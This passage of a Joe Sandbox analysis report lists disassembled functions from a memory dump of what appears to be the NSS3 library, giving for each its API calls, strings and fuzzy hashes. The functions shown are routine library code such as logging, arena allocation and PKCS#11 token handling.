Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 1030ecf165836757f06e3392d9431a57b342093aeb19ea9417a4236a6fae81cb
Instruction ID: 748061facad08006ba931dc8001612e855a5d99f7f922b8ee0c36f4ef58b8f69
Opcode Fuzzy Hash: 1030ecf165836757f06e3392d9431a57b342093aeb19ea9417a4236a6fae81cb
Instruction Fuzzy Hash: FE4180B5A04655CFCB00AF78D594559BBF4FF05324F094669E8A89BB00E730E886CF91

Function 6CB87CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6CB87CE0

Part of subcall function 6CB39BF0: TlsGetValue.KERNEL32(?,?,?,6CB80A75), ref: 6CB39C07

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB87D36
PR_Realloc.NSS3(?,00000080), ref: 6CB87D6D
PR_GetCurrentThread.NSS3 ref: 6CB87D8B
PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6CB87DC2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB87DD8
malloc.MOZGLUE(00000080), ref: 6CB87DF8
PR_GetCurrentThread.NSS3 ref: 6CB87E06

Strings

:%s:%d:0x%lx, xrefs: 6CB87DB9
NSPR_INHERIT_FDS=%s:%d:0x%lx, xrefs: 6CB87DF0

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
API String ID: 530461531-3274975309
Opcode ID: f2a6b838ebd0248938d8a52c0c16db6f1d1a54ff9886848eef0c141b25e0aeb7
Instruction ID: a1e6316c0d5524af989fe8faab47ac9dcfea385675031a7a8af7f0ec7523bcd6
Opcode Fuzzy Hash: f2a6b838ebd0248938d8a52c0c16db6f1d1a54ff9886848eef0c141b25e0aeb7
Instruction Fuzzy Hash: 1941E6B5A012919FDB04CF28CC8096B37B6FF8431CB29456CF819ABB51D771E941CBA1

Function 6CB87E20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103filestringpipeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB87E37
PR_GetEnvSecure.NSS3(NSPR_INHERIT_FDS), ref: 6CB87E46

Part of subcall function 6CA61240: TlsGetValue.KERNEL32(00000040,?,6CA6116C,NSPR_LOG_MODULES), ref: 6CA61267
Part of subcall function 6CA61240: EnterCriticalSection.KERNEL32(?,?,?,6CA6116C,NSPR_LOG_MODULES), ref: 6CA6127C
Part of subcall function 6CA61240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CA6116C,NSPR_LOG_MODULES), ref: 6CA61291
Part of subcall function 6CA61240: PR_Unlock.NSS3(?,?,?,?,6CA6116C,NSPR_LOG_MODULES), ref: 6CA612A0

PR_sscanf.NSS3(00000001,%d:0x%lx,?,?), ref: 6CB87EAF
PR_ImportFile.NSS3(?), ref: 6CB87ECF
PR_GetCurrentThread.NSS3 ref: 6CB87ED6
PR_ImportTCPSocket.NSS3(?), ref: 6CB87F01
PR_ImportUDPSocket.NSS3(?,?), ref: 6CB87F0B
PR_ImportPipe.NSS3(?,?,?), ref: 6CB87F15

Strings

NSPR_INHERIT_FDS, xrefs: 6CB87E41
%d:0x%lx, xrefs: 6CB87EA9

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Import$Socket$CriticalCurrentEnterFilePipeR_sscanfSectionSecureThreadUnlockValuegetenvstrlen
String ID: %d:0x%lx$NSPR_INHERIT_FDS
API String ID: 2743735569-629032437
Opcode ID: 92c0f047f9157de87fe598f7da40174bb4307811c688020eea5bc5a003d4b8d9
Instruction ID: 1c8cae95e2dfac8a6f8e1bebcb4746ff17eb2d7c5ac05ffe1efd74d880b7f548
Opcode Fuzzy Hash: 92c0f047f9157de87fe598f7da40174bb4307811c688020eea5bc5a003d4b8d9
Instruction Fuzzy Hash: 6A312571B051D69BEB009F69C940EAFB7ACEF0634DF200565F805B7A11E7B19D05C7A2

Function 6CABECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CABDE64), ref: 6CABED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CABED22

Part of subcall function 6CACB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBA18D0,?), ref: 6CACB095

PL_FreeArenaPool.NSS3(?), ref: 6CABED4A
PL_FinishArenaPool.NSS3(?), ref: 6CABED6B
PR_CallOnce.NSS3(6CBD2AA4,6CAD12D0), ref: 6CABED38

Part of subcall function 6C9F4C70: TlsGetValue.KERNEL32(?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4C97
Part of subcall function 6C9F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4CB0
Part of subcall function 6C9F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4CC9

SECOID_FindOID_Util.NSS3(?), ref: 6CABED52
PR_CallOnce.NSS3(6CBD2AA4,6CAD12D0), ref: 6CABED83
PL_FreeArenaPool.NSS3(?), ref: 6CABED95
PL_FinishArenaPool.NSS3(?), ref: 6CABED9D

Part of subcall function 6CAD64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CAD127C,00000000,00000000,00000000), ref: 6CAD650E

Strings

security, xrefs: 6CABED06

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 5f9aff2eaa9c91c51a975cc757f4a712fc5c9f8a655a9a9f9c95fa243fc6dd52
Instruction ID: e5022570b213a97c4177476e7dd6c8607fe54a686ae579c3ebab66b08244e67f
Opcode Fuzzy Hash: 5f9aff2eaa9c91c51a975cc757f4a712fc5c9f8a655a9a9f9c95fa243fc6dd52
Instruction Fuzzy Hash: 7711A67AA002446BE7005624AD44BBB737CAF0160CF060974E851B2F81FB74BA9C86E7

Function 6CAA2CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6CAA2CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CAA2D07

Part of subcall function 6CB809D0: PR_Now.NSS3 ref: 6CB80A22
Part of subcall function 6CB809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CB80A35
Part of subcall function 6CB809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CB80A66
Part of subcall function 6CB809D0: PR_GetCurrentThread.NSS3 ref: 6CB80A70
Part of subcall function 6CB809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CB80A9D
Part of subcall function 6CB809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CB80AC8
Part of subcall function 6CB809D0: PR_vsmprintf.NSS3(?,?), ref: 6CB80AE8
Part of subcall function 6CB809D0: EnterCriticalSection.KERNEL32(?), ref: 6CB80B19
Part of subcall function 6CB809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB80B48
Part of subcall function 6CB809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB80C76
Part of subcall function 6CB809D0: PR_LogFlush.NSS3 ref: 6CB80C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CAA2D22

Part of subcall function 6CB809D0: OutputDebugStringA.KERNEL32(?), ref: 6CB80B88
Part of subcall function 6CB809D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB80C5D
Part of subcall function 6CB809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CB80C8D
Part of subcall function 6CB809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB80C9C
Part of subcall function 6CB809D0: OutputDebugStringA.KERNEL32(?), ref: 6CB80CD1
Part of subcall function 6CB809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CB80CEC
Part of subcall function 6CB809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB80CFB
Part of subcall function 6CB809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB80D16
Part of subcall function 6CB809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CB80D26
Part of subcall function 6CB809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB80D35
Part of subcall function 6CB809D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CB80D65
Part of subcall function 6CB809D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CB80D70
Part of subcall function 6CB809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB80D90
Part of subcall function 6CB809D0: free.MOZGLUE(00000000), ref: 6CB80D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CAA2D3B

Part of subcall function 6CB809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CB80BAB
Part of subcall function 6CB809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB80BBA
Part of subcall function 6CB809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB80D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CAA2D54

Part of subcall function 6CB809D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB80BCB
Part of subcall function 6CB809D0: EnterCriticalSection.KERNEL32(?), ref: 6CB80BDE
Part of subcall function 6CB809D0: OutputDebugStringA.KERNEL32(?), ref: 6CB80C16

Strings

slotID = 0x%x, xrefs: 6CAA2D02
pLabel = 0x%p, xrefs: 6CAA2D4F
ulPinLen = %d, xrefs: 6CAA2D36
pPin = 0x%p, xrefs: 6CAA2D1D
C_InitToken, xrefs: 6CAA2CE7

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
API String ID: 420000887-1567254798
Opcode ID: f21a2d36834cb95acfa0530a9b746637e51bac23fc91ee974e4aa44751e4d7fa
Instruction ID: 98d88167c1f70feda4cf8bc98d5cd3e1d0c7698ee35f0dc059dfff32b3b1004a
Opcode Fuzzy Hash: f21a2d36834cb95acfa0530a9b746637e51bac23fc91ee974e4aa44751e4d7fa
Instruction Fuzzy Hash: 7E214C352010C4FFDB009F94ED6CA497BB5EB4631DF448124E90897623CB30AC9ECB62

Function 6CB80EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6CA62357), ref: 6CB80EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CA62357), ref: 6CB80EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CB80EE6

Part of subcall function 6CB809D0: PR_Now.NSS3 ref: 6CB80A22
Part of subcall function 6CB809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CB80A35
Part of subcall function 6CB809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CB80A66
Part of subcall function 6CB809D0: PR_GetCurrentThread.NSS3 ref: 6CB80A70
Part of subcall function 6CB809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CB80A9D
Part of subcall function 6CB809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CB80AC8
Part of subcall function 6CB809D0: PR_vsmprintf.NSS3(?,?), ref: 6CB80AE8
Part of subcall function 6CB809D0: EnterCriticalSection.KERNEL32(?), ref: 6CB80B19
Part of subcall function 6CB809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB80B48
Part of subcall function 6CB809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB80C76
Part of subcall function 6CB809D0: PR_LogFlush.NSS3 ref: 6CB80C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CB80EFA

Part of subcall function 6CA6AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CA6AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB80F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB80F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB80F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB80F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6CB80ED9, 6CB80EE5, 6CB80F06, 6CB80F0B
Aborting, xrefs: 6CB80EB3

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: f907de04a66bf6dfdb96a663aba32147d10a3ee7e5b007ec69b71c8bd66f1f5c
Instruction ID: 77dd1b261e65b0433616a9e2d07ce4627b1938d5c06b8cb229dda5349883ec67
Opcode Fuzzy Hash: f907de04a66bf6dfdb96a663aba32147d10a3ee7e5b007ec69b71c8bd66f1f5c
Instruction Fuzzy Hash: ACF0A4B99001647BDA003BA09C49CAF3F3DDF5A364F004024FD0957A02DA36EA5596B2

Function 6CAE4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6CAE4DCB

Part of subcall function 6CAD0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA787ED,00000800,6CA6EF74,00000000), ref: 6CAD1000
Part of subcall function 6CAD0FF0: PR_NewLock.NSS3(?,00000800,6CA6EF74,00000000), ref: 6CAD1016
Part of subcall function 6CAD0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA787ED,00000008,?,00000800,6CA6EF74,00000000), ref: 6CAD102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CAE4DE1

Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD10F3
Part of subcall function 6CAD10C0: EnterCriticalSection.KERNEL32(?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD110C
Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1141
Part of subcall function 6CAD10C0: PR_Unlock.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1182
Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CAE4DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAE4E59

Part of subcall function 6CACFAB0: free.MOZGLUE(?,-00000001,?,?,6CA6F673,00000000,00000000), ref: 6CACFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBA300C,00000000), ref: 6CAE4EB8
SECOID_FindOID_Util.NSS3(?), ref: 6CAE4EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CAE4F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CAE521A

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: ee70495f407c0c8fcadc10d0001f7aa91b313d21539700bea55e59a9ecdb97de
Instruction ID: 47a3a17479b5d75c9288e71978bc6045b81a38b53b704f9c5cc70cee0b3a0369
Opcode Fuzzy Hash: ee70495f407c0c8fcadc10d0001f7aa91b313d21539700bea55e59a9ecdb97de
Instruction Fuzzy Hash: C4F16A71E002098FDB04CF99E8407AEB7B6BF48358F294169E915AB781E775E9C1CBD0

Function 6CAE0C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6CAE2C2A), ref: 6CAE0C81

Part of subcall function 6CACBE30: SECOID_FindOID_Util.NSS3(6CA8311B,00000000,?,6CA8311B,?), ref: 6CACBE44

Part of subcall function 6CAB8500: SECOID_GetAlgorithmTag_Util.NSS3(6CAB95DC,00000000,00000000,00000000,?,6CAB95DC,00000000,00000000,?,6CA97F4A,00000000,?,00000000,00000000), ref: 6CAB8517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAE0CC4

Part of subcall function 6CACFAB0: free.MOZGLUE(?,-00000001,?,?,6CA6F673,00000000,00000000), ref: 6CACFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAE0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CAE0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CAE0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CAE0D7D
free.MOZGLUE(00000000), ref: 6CAE0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAE0DC1
free.MOZGLUE(00000000), ref: 6CAE0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAE0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CAE0E0F

Part of subcall function 6CAB95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CA97F4A,00000000,?,00000000,00000000), ref: 6CAB95E0
Part of subcall function 6CAB95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CA97F4A,00000000,?,00000000,00000000), ref: 6CAB95F5
Part of subcall function 6CAB95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CAB9609
Part of subcall function 6CAB95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAB961D
Part of subcall function 6CAB95C0: PK11_GetInternalSlot.NSS3 ref: 6CAB970B
Part of subcall function 6CAB95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CAB9756
Part of subcall function 6CAB95C0: PK11_GetIVLength.NSS3(?), ref: 6CAB9767
Part of subcall function 6CAB95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CAB977E
Part of subcall function 6CAB95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAB978E

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID:
API String ID: 3136566230-0
Opcode ID: 3c892077aee2e21b8d6b6a06055f291930f2dc1e363d023c11a45146ec307659
Instruction ID: 5cb7957e8a9e7873ae080bb38f6178efb878127cc3bebd4a028a72005f92f572
Opcode Fuzzy Hash: 3c892077aee2e21b8d6b6a06055f291930f2dc1e363d023c11a45146ec307659
Instruction Fuzzy Hash: 6D41D5B1D00245ABEB009F65DD85BAF7678EF4830CF180128ED1567741EB35EA98DBE2

Function 6CA74FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6CBC0148,?,6CA86FEC), ref: 6CA7502A
PR_NewLock.NSS3(00000001,00000000,6CBC0148,?,6CA86FEC), ref: 6CA75034
PL_NewHashTable.NSS3(00000000,6CACFE80,6CACFD30,6CB1C350,00000000,00000000,00000001,00000000,6CBC0148,?,6CA86FEC), ref: 6CA75055
PL_NewHashTable.NSS3(00000000,6CACFE80,6CACFD30,6CB1C350,00000000,00000000,?,00000001,00000000,6CBC0148,?,6CA86FEC), ref: 6CA7506D

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: 91fb1c1e404ed12113d05f42b81be16949b4f095a10db779be37f6464d1fcbc1
Instruction ID: f90ec20d71742e038c106e1a21161163f613699532537339293e43c9f62e94c8
Opcode Fuzzy Hash: 91fb1c1e404ed12113d05f42b81be16949b4f095a10db779be37f6464d1fcbc1
Instruction Fuzzy Hash: 1F31F6B5B412A09BEB249B65CD2EB4737B8BB27748F058134E91583640D374EC85CBF2

Function 6CA12E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA12F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6CA12FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6CA13005
memcpy.VCRUNTIME140(?,?,?), ref: 6CA130EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA13131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA13178

Strings

